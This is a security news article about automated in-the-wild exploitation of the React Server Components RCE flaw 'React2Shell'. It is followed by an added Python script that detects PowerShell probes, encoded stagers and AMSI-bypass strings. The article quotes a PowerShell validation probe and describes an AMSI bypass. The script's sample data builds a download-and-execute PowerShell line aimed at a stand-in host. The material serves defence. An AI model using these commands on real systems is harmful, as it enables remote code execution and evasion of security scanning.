A critical remote code execution vulnerability, tracked as CVE-2025-55182 and dubbed “React2Shell,” is now under active exploitation in the wild.
GreyNoise researchers have detected opportunistic, largely automated exploitation attempts targeting the unsafe deserialization flaw in the React Server Components Flight protocol.
The vulnerability enables unauthenticated remote code execution (RCE) affecting React and downstream ecosystems, including Next.js, prompting urgent calls for immediate patching.
Automated Exploitation Campaign Underway
GreyNoise data shows a common attack pattern in which attackers run their operations from a mix of newly seen and previously known infrastructure.
The HTTP client and TCP stack fingerprints show overwhelmingly automation-heavy traffic rather than organic browsing behavior.
Researchers have already observed the vulnerability being integrated into Mirai and other botnet exploitation kits, signaling a dangerous evolution in the threat landscape.

Initial access attempts leverage publicly disclosed proof-of-concept code as a foundation.
The attackers employ multi-stage payloads that start with proof-of-execution probes that use PowerShell arithmetic operations to validate remote code execution cheaply.
Subsequent stages deploy encoded PowerShell download-and-execute stagers utilizing reflection to bypass Windows AMSI security by setting System.Management.Automation.AmsiUtils.amsiInitFailed to true.
Technical Attack Chain and Indicators
The exploitation workflow follows a predictable but effective pattern. Attackers first perform basic validation using "cheap math" PowerShell commands, such as powershell -c '40138*41979', to confirm command execution and deterministic output.
After successful validation, encoded PowerShell stagers download stage-two payloads that employ lightweight byte-transform obfuscation and AMSI bypass techniques.
Traffic analysis shows the top user agents are Go-http-client/1.1, Assetnote-tagged scanners on Chrome 60, Safari 17.2.1, and smaller volumes from aiohttp and python-requests.
This composition is consistent with standard early exploitation waves featuring a mix of researcher traffic, scanner activity, and spoofed browser strings.
The JA4T and JA4H fingerprint distribution concentrates heavily in ASNs attributed to the Netherlands, China, the United States, and Hong Kong, with nearly 50 percent of observed exploitation IPs first seen in December 2025.

Defenders can leverage GreyNoise Block to immediately block malicious IPs associated with this campaign using the platform’s React Server Components template.
Enterprise customers have access to targeted blocklists that support full queries with ASN specifications, JA4 fingerprints, and destination-country filters.
Endpoint detection should focus on PowerShell process creation combined with encoded commands and suspicious primitives like DownloadString or IEX, along with script blocks containing AMSI bypass indicators.
Organizations must prioritize patching vulnerable React Server Components and Next.js deployments, while monitoring for repeated PowerShell arithmetic validation attempts across short time windows, which serve as strong exploitation indicators.
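The detection guidance above, together with the "cheap math" validation probe described earlier, as an added Python example that is not from GreyNoise or the original article: it tags constructed process-creation command lines for arithmetic probes, encoded commands, download-and-execute primitives and AMSI-bypass strings, and flags sources that repeat probes inside a short window. The regexes, tag names, sample IPs, timestamps and the stage-two script are my own assumptions, not observed telemetry.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "Cheap math" validation probe, e.g. powershell -c '40138*41979' (quotes optional).
ARITH_PROBE = re.compile(r"powershell(?:\.exe)?\s+-c(?:ommand)?\s+['\"]?\s*\d+\s*\*\s*\d+", re.I)
# -e / -enc / -EncodedCommand followed by a base64-encoded UTF-16LE script.
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
BODY_RULES = (  # indicators checked against the decoded script (or the raw command line)
    ("download_exec", re.compile(r"downloadstring|\biex\b|invoke-expression", re.I)),
    ("amsi_bypass", re.compile(r"amsiutils|amsiinitfailed", re.I)),
)
def decode_encoded_command(cmdline):
    # Return the decoded script of an -EncodedCommand invocation, else None.
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
        return None

def classify(cmdline):
    """Tag one process-creation command line with the indicators it matches."""
    tags = {"arith_probe"} if ARITH_PROBE.search(cmdline) else set()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded")
    body = cmdline if decoded is None else decoded  # scan the decoded script when present
    return tags | {name for name, rx in BODY_RULES if rx.search(body)}

def repeated_probes(events, window_seconds=60, threshold=2):
    """Map source -> probe count for sources sending >= threshold probes inside one window."""
    by_src = defaultdict(list)
    for ts, src, cmd in events:
        if "arith_probe" in classify(cmd):
            by_src[src].append(datetime.fromisoformat(ts))
    window, flagged = timedelta(seconds=window_seconds), {}
    for src, times in by_src.items():
        times.sort()
        if any(times[i + threshold - 1] - times[i] <= window for i in range(len(times) - threshold + 1)):
            flagged[src] = len(times)
    return flagged

STAGE2 = "$f='amsiInitFailed';IEX (New-Object Net.WebClient).DownloadString('http://x.invalid/s')"
SAMPLE_EVENTS = [  # constructed (timestamp, source, command line), not real telemetry
    ("2025-12-05T10:00:01", "198.51.100.7", "powershell -c '40138*41979'"),
    ("2025-12-05T10:00:09", "198.51.100.7", "powershell.exe -c 51234*67890"),
    ("2025-12-05T10:00:20", "198.51.100.7",
     "powershell -enc " + base64.b64encode(STAGE2.encode("utf-16-le")).decode()),
    ("2025-12-05T10:30:00", "203.0.113.9", "powershell -c Get-Date"),
]
```

Running repeated_probes(SAMPLE_EVENTS) flags the first source with two probes eight seconds apart, while the benign Get-Date invocation produces no tags.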
